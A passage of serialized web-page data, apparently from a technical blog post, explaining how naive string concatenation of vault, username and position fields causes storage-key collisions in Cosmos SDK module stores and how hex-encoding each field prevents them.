map",{"type":25,"tag":216,"props":89099,"children":89100},{"style":6964},[89101],{"type":31,"value":7701},{"type":25,"tag":216,"props":89103,"children":89104},{"style":7375},[89105],{"type":31,"value":89106},"VaultId",{"type":25,"tag":216,"props":89108,"children":89109},{"style":6964},[89110],{"type":31,"value":19368},{"type":25,"tag":216,"props":89112,"children":89113},{"style":6936},[89114],{"type":31,"value":71071},{"type":25,"tag":216,"props":89116,"children":89117},{"style":6964},[89118],{"type":31,"value":7701},{"type":25,"tag":216,"props":89120,"children":89121},{"style":7375},[89122],{"type":31,"value":89123},"Username",{"type":25,"tag":216,"props":89125,"children":89126},{"style":6964},[89127],{"type":31,"value":19368},{"type":25,"tag":216,"props":89129,"children":89130},{"style":6936},[89131],{"type":31,"value":71071},{"type":25,"tag":216,"props":89133,"children":89134},{"style":6964},[89135],{"type":31,"value":7701},{"type":25,"tag":216,"props":89137,"children":89138},{"style":7375},[89139],{"type":31,"value":89140},"PositionName",{"type":25,"tag":216,"props":89142,"children":89143},{"style":6964},[89144],{"type":31,"value":19368},{"type":25,"tag":216,"props":89146,"children":89147},{"style":7375},[89148],{"type":31,"value":89149},"Position\n",{"type":25,"tag":38,"props":89151,"children":89152},{},[89153,89155,89161],{"type":31,"value":89154},"Given that there are two levels of keys in ",{"type":25,"tag":82,"props":89156,"children":89158},{"className":89157},[],[89159],{"type":31,"value":89160},"PositionMap",{"type":31,"value":89162},", we should try to serialize these three map keys into a hierarchically searchable storage key. The most straightforward mitigation is to convert all fields into strings and concat them together.",{"type":25,"tag":206,"props":89164,"children":89166},{"code":89165,"language":80136,"meta":7,"className":80137,"style":7},"storageKey := fmt.Sprintf(\n    \"%d%s%s\",\n    vaultId,\n    username,\n    positionName,\n)\n",[89167],{"type":25,"tag":82,"props":89168,"children":89169},{"__ignoreMap":7},[89170,89199,89211,89223,89235,89247],{"type":25,"tag":216,"props":89171,"children":89172},{"class":6922,"line":6923},[89173,89178,89182,89186,89190,89195],{"type":25,"tag":216,"props":89174,"children":89175},{"style":6947},[89176],{"type":31,"value":89177},"storageKey",{"type":25,"tag":216,"props":89179,"children":89180},{"style":6953},[89181],{"type":31,"value":80388},{"type":25,"tag":216,"props":89183,"children":89184},{"style":6947},[89185],{"type":31,"value":86206},{"type":25,"tag":216,"props":89187,"children":89188},{"style":6964},[89189],{"type":31,"value":179},{"type":25,"tag":216,"props":89191,"children":89192},{"style":7047},[89193],{"type":31,"value":89194},"Sprintf",{"type":25,"tag":216,"props":89196,"children":89197},{"style":6964},[89198],{"type":31,"value":7420},{"type":25,"tag":216,"props":89200,"children":89201},{"class":6922,"line":6769},[89202,89207],{"type":25,"tag":216,"props":89203,"children":89204},{"style":8205},[89205],{"type":31,"value":89206},"    \"%d%s%s\"",{"type":25,"tag":216,"props":89208,"children":89209},{"style":6964},[89210],{"type":31,"value":7465},{"type":25,"tag":216,"props":89212,"children":89213},{"class":6922,"line":6778},[89214,89219],{"type":25,"tag":216,"props":89215,"children":89216},{"style":6947},[89217],{"type":31,"value":89218},"    vaultId",{"type":25,"tag":216,"props":89220,"children":89221},{"style":6964},[89222],{"type":31,"value":7465},{"type":25,"tag":216,"props":89224,"children":89225},{"class":6922,"line":7005},[89226,89231],{"type":25,"tag":216,"props":89227,"children":89228},{"style":6947},[89229],{"type":31,"value":89230},"    username",{"type":25,"tag":216,"props":89232,"children":89233},{"style":6964},[89234],{"type":31,"value":7465},{"type":25,"tag":216,"props":89236,"children":89237},{"class":6922,"line":7110},[89238,89243],{"type":25,"tag":216,"props":89239,"children":89240},{"style":6947},[89241],{"type":31,"value":89242},"    positionName",{"type":25,"tag":216,"props":89244,"children":89245},{"style":6964},[89246],{"type":31,"value":7465},{"type":25,"tag":216,"props":89248,"children":89249},{"class":6922,"line":7216},[89250],{"type":25,"tag":216,"props":89251,"children":89252},{"style":6964},[89253],{"type":31,"value":7107},{"type":25,"tag":38,"props":89255,"children":89256},{},[89257],{"type":31,"value":89258},"Although plain concatenation allows us to easily construct a storage key, it becomes apparent that this implementation is prone to key collisions.",{"type":25,"tag":206,"props":89260,"children":89262},{"code":89261},"vaultId = 1,  username = \"2a\", positionName = \"b\"\n    => storageKey = \"12ab\"\n\nvaultId = 12, username = \"a\",  positionName = \"b\"\n    => storageKey = \"12ab\"\n",[89263],{"type":25,"tag":82,"props":89264,"children":89265},{"__ignoreMap":7},[89266],{"type":31,"value":89261},{"type":25,"tag":38,"props":89268,"children":89269},{},[89270,89275],{"type":25,"tag":64,"props":89271,"children":89272},{},[89273],{"type":31,"value":89274},"So, how can we mitigate this issue?",{"type":31,"value":89276},"\nPerhaps we can add a field separator between each field, which would resemble the following:",{"type":25,"tag":206,"props":89278,"children":89280},{"code":89279,"language":80136,"meta":7,"className":80137,"style":7},"const (\n    Seperator = \"|\"\n)\n\nstorageKey := fmt.Sprintf(\n    \"%d%s%s%s%s\",\n    vaultId,\n    Seperator,\n    username,\n    Seperator,\n    positionName,\n)\n",[89281],{"type":25,"tag":82,"props":89282,"children":89283},{"__ignoreMap":7},[89284,89295,89312,89319,89326,89353,89365,89376,89387,89398,89409,89420],{"type":25,"tag":216,"props":89285,"children":89286},{"class":6922,"line":6923},[89287,89291],{"type":25,"tag":216,"props":89288,"children":89289},{"style":6936},[89290],{"type":31,"value":13611},{"type":25,"tag":216,"props":89292,"children":89293},{"style":6964},[89294],{"type":31,"value":82538},{"type":25,"tag":216,"props":89296,"children":89297},{"class":6922,"line":6769},[89298,89303,89307],{"type":25,"tag":216,"props":89299,"children":89300},{"style":6947},[89301],{"type":31,"value":89302},"    Seperator",{"type":25,"tag":216,"props":89304,"children":89305},{"style":6953},[89306],{"type":31,"value":6956},{"type":25,"tag":216,"props":89308,"children":89309},{"style":8205},[89310],{"type":31,"value":89311}," \"|\"\n",{"type":25,"tag":216,"props":89313,"children":89314},{"class":6922,"line":6778},[89315],{"type":25,"tag":216,"props":89316,"children":89317},{"style":6964},[89318],{"type":31,"value":7107},{"type":25,"tag":216,"props":89320,"children":89321},{"class":6922,"line":7005},[89322],{"type":25,"tag":216,"props":89323,"children":89324},{"emptyLinePlaceholder":16},[89325],{"type":31,"value":7642},{"type":25,"tag":216,"props":89327,"children":89328},{"class":6922,"line":7110},[89329,89333,89337,89341,89345,89349],{"type":25,"tag":216,"props":89330,"children":89331},{"style":6947},[89332],{"type":31,"value":89177},{"type":25,"tag":216,"props":89334,"children":89335},{"style":6953},[89336],{"type":31,"value":80388},{"type":25,"tag":216,"props":89338,"children":89339},{"style":6947},[89340],{"type":31,"value":86206},{"type":25,"tag":216,"props":89342,"children":89343},{"style":6964},[89344],{"type":31,"value":179},{"type":25,"tag":216,"props":89346,"children":89347},{"style":7047},[89348],{"type":31,"value":89194},{"type":25,"tag":216,"props":89350,"children":89351},{"style":6964},[89352],{"type":31,"value":7420},{"type":25,"tag":216,"props":89354,"children":89355},{"class":6922,"line":7216},[89356,89361],{"type":25,"tag":216,"props":89357,"children":89358},{"style":8205},[89359],{"type":31,"value":89360},"    \"%d%s%s%s%s\"",{"type":25,"tag":216,"props":89362,"children":89363},{"style":6964},[89364],{"type":31,"value":7465},{"type":25,"tag":216,"props":89366,"children":89367},{"class":6922,"line":7244},[89368,89372],{"type":25,"tag":216,"props":89369,"children":89370},{"style":6947},[89371],{"type":31,"value":89218},{"type":25,"tag":216,"props":89373,"children":89374},{"style":6964},[89375],{"type":31,"value":7465},{"type":25,"tag":216,"props":89377,"children":89378},{"class":6922,"line":7257},[89379,89383],{"type":25,"tag":216,"props":89380,"children":89381},{"style":6947},[89382],{"type":31,"value":89302},{"type":25,"tag":216,"props":89384,"children":89385},{"style":6964},[89386],{"type":31,"value":7465},{"type":25,"tag":216,"props":89388,"children":89389},{"class":6922,"line":7275},[89390,89394],{"type":25,"tag":216,"props":89391,"children":89392},{"style":6947},[89393],{"type":31,"value":89230},{"type":25,"tag":216,"props":89395,"children":89396},{"style":6964},[89397],{"type":31,"value":7465},{"type":25,"tag":216,"props":89399,"children":89400},{"class":6922,"line":7296},[89401,89405],{"type":25,"tag":216,"props":89402,"children":89403},{"style":6947},[89404],{"type":31,"value":89302},{"type":25,"tag":216,"props":89406,"children":89407},{"style":6964},[89408],{"type":31,"value":7465},{"type":25,"tag":216,"props":89410,"children":89411},{"class":6922,"line":7305},[89412,89416],{"type":25,"tag":216,"props":89413,"children":89414},{"style":6947},[89415],{"type":31,"value":89242},{"type":25,"tag":216,"props":89417,"children":89418},{"style":6964},[89419],{"type":31,"value":7465},{"type":25,"tag":216,"props":89421,"children":89422},{"class":6922,"line":7557},[89423],{"type":25,"tag":216,"props":89424,"children":89425},{"style":6964},[89426],{"type":31,"value":7107},{"type":25,"tag":38,"props":89428,"children":89429},{},[89430],{"type":31,"value":89431},"Inserting a separator helps prevent most accidental collisions, but does it completely solve the problem?",{"type":25,"tag":38,"props":89433,"children":89434},{},[89435,89437,89443,89444,89450],{"type":31,"value":89436},"Sadly, it doesn't. Since the ",{"type":25,"tag":82,"props":89438,"children":89440},{"className":89439},[],[89441],{"type":31,"value":89442},"username",{"type":31,"value":1307},{"type":25,"tag":82,"props":89445,"children":89447},{"className":89446},[],[89448],{"type":31,"value":89449},"vaultName",{"type":31,"value":89451}," are both strings that may contain arbitrary characters (including the separator), collisions can still happen.",{"type":25,"tag":206,"props":89453,"children":89455},{"code":89454},"vaultId = 1, username = \"a|\", positionName = \"b\"\n    => storageKey = \"1|a||b\"\n\nvaultId = 1, username = \"a\",  positionName = \"|b\"\n    => storageKey = \"1|a||b\"\n",[89456],{"type":25,"tag":82,"props":89457,"children":89458},{"__ignoreMap":7},[89459],{"type":31,"value":89454},{"type":25,"tag":38,"props":89461,"children":89462},{},[89463],{"type":31,"value":89464},"To further mitigate this, we could encode all fields to ensure that the separator is excluded in individual fields, thus making field injections impossible.",{"type":25,"tag":206,"props":89466,"children":89468},{"code":89467,"language":80136,"meta":7,"className":80137,"style":7},"const (\n    Seperator = \"|\"\n)\n\n\nusernameEncoded := make(\n    []byte,\n    hex.EncodedLen(len(username)),\n)\nhex.Encode(usernameEncoded, username)\n\npositionNameEncoded := make(\n    []byte,\n    hex.EncodedLen(len(positionName)),\n)\nhex.Encode(positionNameEncoded, positionName)\n\nstorageKey := fmt.Sprintf(\n    \"%d%s%s%s%s\",\n    vaultId,\n    Seperator,\n    usernameEncoded,\n    Seperator,\n    positionNameEncoded\n)\n",[89469],{"type":25,"tag":82,"props":89470,"children":89471},{"__ignoreMap":7},[89472,89483,89498,89505,89512,89519,89540,89556,89594,89601,89638,89645,89665,89680,89716,89723,89758,89765,89792,89803,89814,89825,89837,89848,89856],{"type":25,"tag":216,"props":89473,"children":89474},{"class":6922,"line":6923},[89475,89479],{"type":25,"tag":216,"props":89476,"children":89477},{"style":6936},[89478],{"type":31,"value":13611},{"type":25,"tag":216,"props":89480,"children":89481},{"style":6964},[89482],{"type":31,"value":82538},{"type":25,"tag":216,"props":89484,"children":89485},{"class":6922,"line":6769},[89486,89490,89494],{"type":25,"tag":216,"props":89487,"children":89488},{"style":6947},[89489],{"type":31,"value":89302},{"type":25,"tag":216,"props":89491,"children":89492},{"style":6953},[89493],{"type":31,"value":6956},{"type":25,"tag":216,"props":89495,"children":89496},{"style":8205},[89497],{"type":31,"value":89311},{"type":25,"tag":216,"props":89499,"children":89500},{"class":6922,"line":6778},[89501],{"type":25,"tag":216,"props":89502,"children":89503},{"style":6964},[89504],{"type":31,"value":7107},{"type":25,"tag":216,"props":89506,"children":89507},{"class":6922,"line":7005},[89508],{"type":25,"tag":216,"props":89509,"children":89510},{"emptyLinePlaceholder":16},[89511],{"type":31,"value":7642},{"type":25,"tag":216,"props":89513,"children":89514},{"class":6922,"line":7110},[89515],{"type":25,"tag":216,"props":89516,"children":89517},{"emptyLinePlaceholder":16},[89518],{"type":31,"value":7642},{"type":25,"tag":216,"props":89520,"children":89521},{"class":6922,"line":7216},[89522,89527,89531,89536],{"type":25,"tag":216,"props":89523,"children":89524},{"style":6947},[89525],{"type":31,"value":89526},"usernameEncoded",{"type":25,"tag":216,"props":89528,"children":89529},{"style":6953},[89530],{"type":31,"value":80388},{"type":25,"tag":216,"props":89532,"children":89533},{"style":7047},[89534],{"type":31,"value":89535}," make",{"type":25,"tag":216,"props":89537,"children":89538},{"style":6964},[89539],{"type":31,"value":7420},{"type":25,"tag":216,"props":89541,"children":89542},{"class":6922,"line":7244},[89543,89548,89552],{"type":25,"tag":216,"props":89544,"children":89545},{"style":6964},[89546],{"type":31,"value":89547},"    []",{"type":25,"tag":216,"props":89549,"children":89550},{"style":7375},[89551],{"type":31,"value":88736},{"type":25,"tag":216,"props":89553,"children":89554},{"style":6964},[89555],{"type":31,"value":7465},{"type":25,"tag":216,"props":89557,"children":89558},{"class":6922,"line":7257},[89559,89564,89568,89573,89577,89581,89585,89589],{"type":25,"tag":216,"props":89560,"children":89561},{"style":6947},[89562],{"type":31,"value":89563},"    hex",{"type":25,"tag":216,"props":89565,"children":89566},{"style":6964},[89567],{"type":31,"value":179},{"type":25,"tag":216,"props":89569,"children":89570},{"style":7047},[89571],{"type":31,"value":89572},"EncodedLen",{"type":25,"tag":216,"props":89574,"children":89575},{"style":6964},[89576],{"type":31,"value":1850},{"type":25,"tag":216,"props":89578,"children":89579},{"style":7047},[89580],{"type":31,"value":13094},{"type":25,"tag":216,"props":89582,"children":89583},{"style":6964},[89584],{"type":31,"value":1850},{"type":25,"tag":216,"props":89586,"children":89587},{"style":6947},[89588],{"type":31,"value":89442},{"type":25,"tag":216,"props":89590,"children":89591},{"style":6964},[89592],{"type":31,"value":89593},")),\n",{"type":25,"tag":216,"props":89595,"children":89596},{"class":6922,"line":7275},[89597],{"type":25,"tag":216,"props":89598,"children":89599},{"style":6964},[89600],{"type":31,"value":7107},{"type":25,"tag":216,"props":89602,"children":89603},{"class":6922,"line":7296},[89604,89609,89613,89618,89622,89626,89630,89634],{"type":25,"tag":216,"props":89605,"children":89606},{"style":6947},[89607],{"type":31,"value":89608},"hex",{"type":25,"tag":216,"props":89610,"children":89611},{"style":6964},[89612],{"type":31,"value":179},{"type":25,"tag":216,"props":89614,"children":89615},{"style":7047},[89616],{"type":31,"value":89617},"Encode",{"type":25,"tag":216,"props":89619,"children":89620},{"style":6964},[89621],{"type":31,"value":1850},{"type":25,"tag":216,"props":89623,"children":89624},{"style":6947},[89625],{"type":31,"value":89526},{"type":25,"tag":216,"props":89627,"children":89628},{"style":6964},[89629],{"type":31,"value":7026},{"type":25,"tag":216,"props":89631,"children":89632},{"style":6947},[89633],{"type":31,"value":89442},{"type":25,"tag":216,"props":89635,"children":89636},{"style":6964},[89637],{"type":31,"value":7107},{"type":25,"tag":216,"props":89639,"children":89640},{"class":6922,"line":7305},[89641],{"type":25,"tag":216,"props":89642,"children":89643},{"emptyLinePlaceholder":16},[89644],{"type":31,"value":7642},{"type":25,"tag":216,"props":89646,"children":89647},{"class":6922,"line":7557},[89648,89653,89657,89661],{"type":25,"tag":216,"props":89649,"children":89650},{"style":6947},[89651],{"type":31,"value":89652},"positionNameEncoded",{"type":25,"tag":216,"props":89654,"children":89655},{"style":6953},[89656],{"type":31,"value":80388},{"type":25,"tag":216,"props":89658,"children":89659},{"style":7047},[89660],{"type":31,"value":89535},{"type":25,"tag":216,"props":89662,"children":89663},{"style":6964},[89664],{"type":31,"value":7420},{"type":25,"tag":216,"props":89666,"children":89667},{"class":6922,"line":7574},[89668,89672,89676],{"type":25,"tag":216,"props":89669,"children":89670},{"style":6964},[89671],{"type":31,"value":89547},{"type":25,"tag":216,"props":89673,"children":89674},{"style":7375},[89675],{"type":31,"value":88736},{"type":25,"tag":216,"props":89677,"children":89678},{"style":6964},[89679],{"type":31,"value":7465},{"type":25,"tag":216,"props":89681,"children":89682},{"class":6922,"line":7591},[89683,89687,89691,89695,89699,89703,89707,89712],{"type":25,"tag":216,"props":89684,"children":89685},{"style":6947},[89686],{"type":31,"value":89563},{"type":25,"tag":216,"props":89688,"children":89689},{"style":6964},[89690],{"type":31,"value":179},{"type":25,"tag":216,"props":89692,"children":89693},{"style":7047},[89694],{"type":31,"value":89572},{"type":25,"tag":216,"props":89696,"children":89697},{"style":6964},[89698],{"type":31,"value":1850},{"type":25,"tag":216,"props":89700,"children":89701},{"style":7047},[89702],{"type":31,"value":13094},{"type":25,"tag":216,"props":89704,"children":89705},{"style":6964},[89706],{"type":31,"value":1850},{"type":25,"tag":216,"props":89708,"children":89709},{"style":6947},[89710],{"type":31,"value":89711},"positionName",{"type":25,"tag":216,"props":89713,"children":89714},{"style":6964},[89715],{"type":31,"value":89593},{"type":25,"tag":216,"props":89717,"children":89718},{"class":6922,"line":7604},[89719],{"type":25,"tag":216,"props":89720,"children":89721},{"style":6964},[89722],{"type":31,"value":7107},{"type":25,"tag":216,"props":89724,"children":89725},{"class":6922,"line":7613},[89726,89730,89734,89738,89742,89746,89750,89754],{"type":25,"tag":216,"props":89727,"children":89728},{"style":6947},[89729],{"type":31,"value":89608},{"type":25,"tag":216,"props":89731,"children":89732},{"style":6964},[89733],{"type":31,"value":179},{"type":25,"tag":216,"props":89735,"children":89736},{"style":7047},[89737],{"type":31,"value":89617},{"type":25,"tag":216,"props":89739,"children":89740},{"style":6964},[89741],{"type":31,"value":1850},{"type":25,"tag":216,"props":89743,"children":89744},{"style":6947},[89745],{"type":31,"value":89652},{"type":25,"tag":216,"props":89747,"children":89748},{"style":6964},[89749],{"type":31,"value":7026},{"type":25,"tag":216,"props":89751,"children":89752},{"style":6947},[89753],{"type":31,"value":89711},{"type":25,"tag":216,"props":89755,"children":89756},{"style":6964},[89757],{"type":31,"value":7107},{"type":25,"tag":216,"props":89759,"children":89760},{"class":6922,"line":7636},[89761],{"type":25,"tag":216,"props":89762,"children":89763},{"emptyLinePlaceholder":16},[89764],{"type":31,"value":7642},{"type":25,"tag":216,"props":89766,"children":89767},{"class":6922,"line":7645},[89768,89772,89776,89780,89784,89788],{"type":25,"tag":216,"props":89769,"children":89770},{"style":6947},[89771],{"type":31,"value":89177},{"type":25,"tag":216,"props":89773,"children":89774},{"style":6953},[89775],{"type":31,"value":80388},{"type":25,"tag":216,"props":89777,"children":89778},{"style":6947},[89779],{"type":31,"value":86206},{"type":25,"tag":216,"props":89781,"children":89782},{"style":6964},[89783],{"type":31,"value":179},{"type":25,"tag":216,"props":89785,"children":89786},{"style":7047},[89787],{"type":31,"value":89194},{"type":25,"tag":216,"props":89789,"children":89790},{"style":6964},[89791],{"type":31,"value":7420},{"type":25,"tag":216,"props":89793,"children":89794},{"class":6922,"line":7654},[89795,89799],{"type":25,"tag":216,"props":89796,"children":89797},{"style":8205},[89798],{"type":31,"value":89360},{"type":25,"tag":216,"props":89800,"children":89801},{"style":6964},[89802],{"type":31,"value":7465},{"type":25,"tag":216,"props":89804,"children":89805},{"class":6922,"line":7722},[89806,89810],{"type":25,"tag":216,"props":89807,"children":89808},{"style":6947},[89809],{"type":31,"value":89218},{"type":25,"tag":216,"props":89811,"children":89812},{"style":6964},[89813],{"type":31,"value":7465},{"type":25,"tag":216,"props":89815,"children":89816},{"class":6922,"line":7730},[89817,89821],{"type":25,"tag":216,"props":89818,"children":89819},{"style":6947},[89820],{"type":31,"value":89302},{"type":25,"tag":216,"props":89822,"children":89823},{"style":6964},[89824],{"type":31,"value":7465},{"type":25,"tag":216,"props":89826,"children":89827},{"class":6922,"line":7760},[89828,89833],{"type":25,"tag":216,"props":89829,"children":89830},{"style":6947},[89831],{"type":31,"value":89832},"    usernameEncoded",{"type":25,"tag":216,"props":89834,"children":89835},{"style":6964},[89836],{"type":31,"value":7465},{"type":25,"tag":216,"props":89838,"children":89839},{"class":6922,"line":7768},[89840,89844],{"type":25,"tag":216,"props":89841,"children":89842},{"style":6947},[89843],{"type":31,"value":89302},{"type":25,"tag":216,"props":89845,"children":89846},{"style":6964},[89847],{"type":31,"value":7465},{"type":25,"tag":216,"props":89849,"children":89850},{"class":6922,"line":7800},[89851],{"type":25,"tag":216,"props":89852,"children":89853},{"style":6947},[89854],{"type":31,"value":89855},"    positionNameEncoded\n",{"type":25,"tag":216,"props":89857,"children":89858},{"class":6922,"line":7808},[89859],{"type":25,"tag":216,"props":89860,"children":89861},{"style":6964},[89862],{"type":31,"value":7107},{"type":25,"tag":38,"props":89864,"children":89865},{},[89866,89868,89873],{"type":31,"value":89867},"We did it. We finally eliminated all potential ",{"type":25,"tag":82,"props":89869,"children":89871},{"className":89870},[],[89872],{"type":31,"value":89177},{"type":31,"value":89874}," collisions.",{"type":25,"tag":38,"props":89876,"children":89877},{},[89878],{"type":31,"value":89879},"Until now, our focus has primarily been on storing a single structure. We recognize that in real-world applications, we frequently encounter scenarios where multiple structures must be stored as persistent states.",{"type":25,"tag":38,"props":89881,"children":89882},{},[89883,89885,89891,89893,89898,89900,89905,89907,89912,89914,89920],{"type":31,"value":89884},"In the Cosmos framework, it is common for each ",{"type":25,"tag":82,"props":89886,"children":89888},{"className":89887},[],[89889],{"type":31,"value":89890},"Module",{"type":31,"value":89892}," to own a few ",{"type":25,"tag":82,"props":89894,"children":89896},{"className":89895},[],[89897],{"type":31,"value":88948},{"type":31,"value":89899}," and have individual ",{"type":25,"tag":82,"props":89901,"children":89903},{"className":89902},[],[89904],{"type":31,"value":83917},{"type":31,"value":89906},"s managing access to storages. It's also important to note that each ",{"type":25,"tag":82,"props":89908,"children":89910},{"className":89909},[],[89911],{"type":31,"value":88948},{"type":31,"value":89913}," should be independent from one another, alleviating developers from having to worry about key collisions between different ",{"type":25,"tag":82,"props":89915,"children":89917},{"className":89916},[],[89918],{"type":31,"value":89919},"Modules",{"type":31,"value":179},{"type":25,"tag":38,"props":89922,"children":89923},{},[89924,89926,89931],{"type":31,"value":89925},"With that being said, what if we have to maintain more than one structure within the same ",{"type":25,"tag":82,"props":89927,"children":89929},{"className":89928},[],[89930],{"type":31,"value":88948},{"type":31,"value":604},{"type":25,"tag":38,"props":89933,"children":89934},{},[89935,89937,89943,89945,89950],{"type":31,"value":89936},"To demonstrate this scenario, we introduce the ",{"type":25,"tag":82,"props":89938,"children":89940},{"className":89939},[],[89941],{"type":31,"value":89942},"NameToAddressMap",{"type":31,"value":89944}," structure, which will be stored in the same ",{"type":25,"tag":82,"props":89946,"children":89948},{"className":89947},[],[89949],{"type":31,"value":88948},{"type":31,"value":89951}," we previously used.",{"type":25,"tag":206,"props":89953,"children":89955},{"code":89954,"language":80136,"meta":7,"className":80137,"style":7},"type VaultId uint64\ntype Username string\n\ntype PositionName string\ntype Position struct {\n    data []byte\n}\ntype PositionMap :=\n    map[VaultId]map[Username]map[PositionName]Position\n\ntype AddressName string\ntype Address struct {\n data []byte\n}\ntype AddressMap :=\n    map[VaultId]map[Username]map[AddressName]Address\n",[89956],{"type":25,"tag":82,"props":89957,"children":89958},{"__ignoreMap":7},[89959,89974,89989,89996,90011,90030,90045,90052,90067,90122,90129,90145,90165,90180,90187,90203],{"type":25,"tag":216,"props":89960,"children":89961},{"class":6922,"line":6923},[89962,89966,89970],{"type":25,"tag":216,"props":89963,"children":89964},{"style":6936},[89965],{"type":31,"value":36719},{"type":25,"tag":216,"props":89967,"children":89968},{"style":7375},[89969],{"type":31,"value":88994},{"type":25,"tag":216,"props":89971,"children":89972},{"style":7375},[89973],{"type":31,"value":80174},{"type":25,"tag":216,"props":89975,"children":89976},{"class":6922,"line":6769},[89977,89981,89985],{"type":25,"tag":216,"props":89978,"children":89979},{"style":6936},[89980],{"type":31,"value":36719},{"type":25,"tag":216,"props":89982,"children":89983},{"style":7375},[89984],{"type":31,"value":89010},{"type":25,"tag":216,"props":89986,"children":89987},{"style":7375},[89988],{"type":31,"value":89015},{"type":25,"tag":216,"props":89990,"children":89991},{"class":6922,"line":6778},[89992],{"type":25,"tag":216,"props":89993,"children":89994},{"emptyLinePlaceholder":16},[89995],{"type":31,"value":7642},{"type":25,"tag":216,"props":89997,"children":89998},{"class":6922,"line":7005},[89999,90003,90007],{"type":25,"tag":216,"props":90000,"children":90001},{"style":6936},[90002],{"type":31,"value":36719},{"type":25,"tag":216,"props":90004,"children":90005},{"style":7375},[90006],{"type":31,"value":89027},{"type":25,"tag":216,"props":90008,"children":90009},{"style":7375},[90010],{"type":31,"value":89015},{"type":25,"tag":216,"props":90012,"children":90013},{"class":6922,"line":7110},[90014,90018,90022,90026],{"type":25,"tag":216,"props":90015,"children":90016},{"style":6936},[90017],{"type":31,"value":36719},{"type":25,"tag":216,"props":90019,"children":90020},{"style":7375},[90021],{"type":31,"value":11376},{"type":25,"tag":216,"props":90023,"children":90024},{"style":6936},[90025],{"type":31,"value":25111},{"type":25,"tag":216,"props":90027,"children":90028},{"style":6964},[90029],{"type":31,"value":7241},{"type":25,"tag":216,"props":90031,"children":90032},{"class":6922,"line":7216},[90033,90037,90041],{"type":25,"tag":216,"props":90034,"children":90035},{"style":6947},[90036],{"type":31,"value":47197},{"type":25,"tag":216,"props":90038,"children":90039},{"style":6964},[90040],{"type":31,"value":80199},{"type":25,"tag":216,"props":90042,"children":90043},{"style":7375},[90044],{"type":31,"value":88200},{"type":25,"tag":216,"props":90046,"children":90047},{"class":6922,"line":7244},[90048],{"type":25,"tag":216,"props":90049,"children":90050},{"style":6964},[90051],{"type":31,"value":7874},{"type":25,"tag":216,"props":90053,"children":90054},{"class":6922,"line":7257},[90055,90059,90063],{"type":25,"tag":216,"props":90056,"children":90057},{"style":6936},[90058],{"type":31,"value":36719},{"type":25,"tag":216,"props":90060,"children":90061},{"style":7375},[90062],{"type":31,"value":89084},{"type":25,"tag":216,"props":90064,"children":90065},{"style":6953},[90066],{"type":31,"value":89089},{"type":25,"tag":216,"props":90068,"children":90069},{"class":6922,"line":7275},[90070,90074,90078,90082,90086,90090,90094,90098,90102,90106,90110,90114,90118],{"type":25,"tag":216,"props":90071,"children":90072},{"style":6936},[90073],{"type":31,"value":89097},{"type":25,"tag":216,"props":90075,"children":90076},{"style":6964},[90077],{"type":31,"value":7701},{"type":25,"tag":216,"props":90079,"children":90080},{"style":7375},[90081],{"type":31,"value":89106},{"type":25,"tag":216,"props":90083,"children":90084},{"style":6964},[90085],{"type":31,"value":19368},{"type":25,"tag":216,"props":90087,"children":90088},{"style":6936},[90089],{"type":31,"value":71071},{"type":25,"tag":216,"props":90091,"children":90092},{"style":6964},[90093],{"type":31,"value":7701},{"type":25,"tag":216,"props":90095,"children":90096},{"style":7375},[90097],{"type":31,"value":89123},{"type":25,"tag":216,"props":90099,"children":90100},{"style":6964},[90101],{"type":31,"value":19368},{"type":25,"tag":216,"props":90103,"children":90104},{"style":6936},[90105],{"type":31,"value":71071},{"type":25,"tag":216,"props":90107,"children":90108},{"style":6964},[90109],{"type":31,"value":7701},{"type":25,"tag":216,"props":90111,"children":90112},{"style":7375},[90113],{"type":31,"value":89140},{"type":25,"tag":216,"props":90115,"children":90116},{"style":6964},[90117],{"type":31,"value":19368},{"type":25,"tag":216,"props":90119,"children":90120},{"style":7375},[90121],{"type":31,"value":89149},{"type":25,"tag":216,"props":90123,"children":90124},{"class":6922,"line":7296},[90125],{"type":25,"tag":216,"props":90126,"children":90127},{"emptyLinePlaceholder":16},[90128],{"type":31,"value":7642},{"type":25,"tag":216,"props":90130,"children":90131},{"class":6922,"line":7305},[90132,90136,90141],{"type":25,"tag":216,"props":90133,"children":90134},{"style":6936},[90135],{"type":31,"value":36719},{"type":25,"tag":216,"props":90137,"children":90138},{"style":7375},[90139],{"type":31,"value":90140}," AddressName",{"type":25,"tag":216,"props":90142,"children":90143},{"style":7375},[90144],{"type":31,"value":89015},{"type":25,"tag":216,"props":90146,"children":90147},{"class":6922,"line":7557},[90148,90152,90157,90161],{"type":25,"tag":216,"props":90149,"children":90150},{"style":6936},[90151],{"type":31,"value":36719},{"type":25,"tag":216,"props":90153,"children":90154},{"style":7375},[90155],{"type":31,"value":90156}," Address",{"type":25,"tag":216,"props":90158,"children":90159},{"style":6936},[90160],{"type":31,"value":25111},{"type":25,"tag":216,"props":90162,"children":90163},{"style":6964},[90164],{"type":31,"value":7241},{"type":25,"tag":216,"props":90166,"children":90167},{"class":6922,"line":7574},[90168,90172,90176],{"type":25,"tag":216,"props":90169,"children":90170},{"style":6947},[90171],{"type":31,"value":19062},{"type":25,"tag":216,"props":90173,"children":90174},{"style":6964},[90175],{"type":31,"value":80199},{"type":25,"tag":216,"props":90177,"children":90178},{"style":7375},[90179],{"type":31,"value":88200},{"type":25,"tag":216,"props":90181,"children":90182},{"class":6922,"line":7591},[90183],{"type":25,"tag":216,"props":90184,"children":90185},{"style":6964},[90186],{"type":31,"value":7874},{"type":25,"tag":216,"props":90188,"children":90189},{"class":6922,"line":7604},[90190,90194,90199],{"type":25,"tag":216,"props":90191,"children":90192},{"style":6936},[90193],{"type":31,"value":36719},{"type":25,"tag":216,"props":90195,"children":90196},{"style":7375},[90197],{"type":31,"value":90198}," 